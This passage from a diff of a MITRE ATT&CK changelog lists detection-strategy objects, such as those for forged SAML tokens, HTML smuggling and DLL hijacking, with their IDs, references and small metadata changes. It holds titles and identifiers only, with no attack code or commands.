+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b6d7d7cb-b56f-4095-b3ac-21147b0123e5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.689000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0148",
+                            "external_id": "DET0148"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Forged SAML Tokens",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3cb835e5-ded1-42c4-a5cc-38911078b0a5",
+                        "x-mitre-analytic--5c6e9102-b3ef-4eaa-85c1-bb5702df0f45",
+                        "x-mitre-analytic--5d2820b1-af59-4ca2-9f9e-b5bc76f55395",
+                        "x-mitre-analytic--93c97a07-283e-46c5-b2ac-560db0382ea9",
+                        "x-mitre-analytic--8359e4ed-c4a1-4734-a3dd-e2d3eb33bc90"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.689000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e1854c9f-2b70-4311-9a46-a420f6c0b6d0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0171",
+                            "external_id": "DET0171"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Forged Web Cookies",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9a6089cc-92a7-48ea-b4a4-4d4d2b6489e3",
+                        "x-mitre-analytic--305c684a-2b36-4209-9d00-778ed16de763",
+                        "x-mitre-analytic--7b981ab1-eb5f-4ad0-a819-90db819a4431",
+                        "x-mitre-analytic--27a0146c-0af8-4323-9c41-fbd3df9af1fa",
+                        "x-mitre-analytic--f8c255ac-8ba5-4971-9e11-420a10e688ad"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--44f32d03-50ce-480f-b531-481bcc6dc0a8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0260",
+                            "external_id": "DET0260"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Forged Web Credentials",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fca70138-f183-4deb-b2a4-59908c76070b",
+                        "x-mitre-analytic--d1eafedb-ac64-46b0-972d-8f8759fc11b3",
+                        "x-mitre-analytic--ff0d2f8d-1fff-4bda-94e6-c0cd50abe6ed",
+                        "x-mitre-analytic--789849fe-7e94-4fd0-904b-02f8c9c0a696",
+                        "x-mitre-analytic--b2569010-23c0-4dd8-9e53-3537c1e89efc",
+                        "x-mitre-analytic--75d43d9f-7b54-4cd4-a6d9-523f8f9a60ff",
+                        "x-mitre-analytic--9735a0b1-df29-49fe-b0f7-973c0b513e8d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a8067c32-46d5-426e-9c1a-e91d360be83d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0313",
+                            "external_id": "DET0313"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for HTML Smuggling via JavaScript Blob + Dynamic File Drop",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0cb02d2e-dcea-4195-80e7-81ec29b4d546",
+                        "x-mitre-analytic--30ae2215-5dd5-4ef2-82bd-965781ef1f42",
+                        "x-mitre-analytic--5f8b5ef5-8b4a-4713-a694-dc0746669a73"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bd2348f8-acef-4310-bd03-cf7b866d2592",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0502",
+                            "external_id": "DET0502"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hidden Artifacts Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e01b29cd-2369-4ad5-bd91-98994f36cd1e",
+                        "x-mitre-analytic--2c3ec402-b9e9-4091-a04d-3b73f260e669",
+                        "x-mitre-analytic--8963772e-2ee5-421e-aec0-b952d05d4efc",
+                        "x-mitre-analytic--a3c087a6-b7dc-464f-9e84-278bf3076ed1",
+                        "x-mitre-analytic--a6299804-cf50-4496-a242-1394ff89c147"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--82c31276-f916-4d67-be83-f09534c0c77e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0461",
+                            "external_id": "DET0461"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hidden File System Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8d7fb300-189d-4654-ba66-3612a8a4cf65",
+                        "x-mitre-analytic--35300a0c-e135-4865-9fe5-9d65a1c77dda",
+                        "x-mitre-analytic--82908b5f-fa84-4420-bb1c-cc77e12e9d3c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3f59957a-2e55-4378-bbe7-090fb1e4f067",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0032",
+                            "external_id": "DET0032"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hidden Files and Directories",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4ea80ec4-bfcc-4bd6-b986-aa2c9fe2d8d6",
+                        "x-mitre-analytic--c4108797-7eb4-4ef8-8dee-c2db00695ab4",
+                        "x-mitre-analytic--73931643-7fae-409c-98b3-00bd88e246e0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c48fd7e3-fbfb-4ab5-b577-12cc0be21f2c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0353",
+                            "external_id": "DET0353"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hidden User Accounts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6039c777-6a85-4df4-86b9-40d95796046e",
+                        "x-mitre-analytic--397a553d-c08d-497e-8fb0-9526f5a205bc",
+                        "x-mitre-analytic--cabc275f-5097-4d2e-aabe-b49a31ba87b9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--55321f9d-1646-45b9-b23e-e3c0fe105400",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0321",
+                            "external_id": "DET0321"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hidden Virtual Instance Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f94e2ae3-7c79-4796-96a1-e462828f9c13",
+                        "x-mitre-analytic--79ba9430-eeb0-4fce-9757-bb81fc2a43d5",
+                        "x-mitre-analytic--4d76bcf2-0935-4f61-8dd9-57ee3713b840",
+                        "x-mitre-analytic--d677a72d-db0e-4332-a467-95b19836ef16"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1167a6c8-d735-4d5d-81f5-d81c6eafe239",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0128",
+                            "external_id": "DET0128"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hidden Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b3bad14e-39a8-4e90-b3e3-46974fd9c2bd",
+                        "x-mitre-analytic--7ef0d746-f233-4b41-b999-43a6b1484574",
+                        "x-mitre-analytic--3d9fb03c-fcc9-4f19-9c49-09d8321f28b9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ba2efedb-2670-4072-b56f-8f12daa31923",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0411",
+                            "external_id": "DET0411"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hide Infrastructure",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9311924d-7d8f-489a-8105-058a60f572fc",
+                        "x-mitre-analytic--c71bf861-9b5a-4f39-a53f-bb6f45f7a971",
+                        "x-mitre-analytic--9cf6c89d-73f7-42f8-b5e4-c87bf3abbb7d",
+                        "x-mitre-analytic--3f74d068-0a8b-4312-91f3-34da6c630c4a",
+                        "x-mitre-analytic--4b16cb6e-7a81-4f97-a4ad-5e461e1cc154"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--07669925-383b-455b-a3e2-3a79e18eed27",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0218",
+                            "external_id": "DET0218"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hijack Execution Flow across OS platforms.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--248be939-35f5-4c8a-9e21-b6de514da577",
+                        "x-mitre-analytic--e21542c4-8df8-4c9e-8b1d-2c9bbe058386",
+                        "x-mitre-analytic--e8fc16bf-6654-4912-96c9-208e4c5bbaa6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bd33de0c-1ed7-42ea-b77d-1fd5d33acd3b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0201",
+                            "external_id": "DET0201"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hijack Execution Flow for DLLs",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--448ecbfb-2b38-4ecc-9c63-f7dd87339271"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--26a281d7-c49e-4e36-ab51-26a757559cf0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0064",
+                            "external_id": "DET0064"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hijack Execution Flow through Path Interception by Unquoted Path",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a972f507-cf1b-4e2f-acdc-877a7891b7cf"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a44e6677-25d9-495a-91fd-e2611dac9477",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0427",
+                            "external_id": "DET0427"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hijack Execution Flow through Service Registry Premission Weakness.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--43f5598c-5c63-40f4-b936-2978bd0f3aa0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7e71997a-80b5-4d0d-807e-472116b46b77",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0436",
+                            "external_id": "DET0436"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hijack Execution Flow through Services File Permissions Weakness.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0a847430-f140-419e-b0fe-bd891bde85a6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
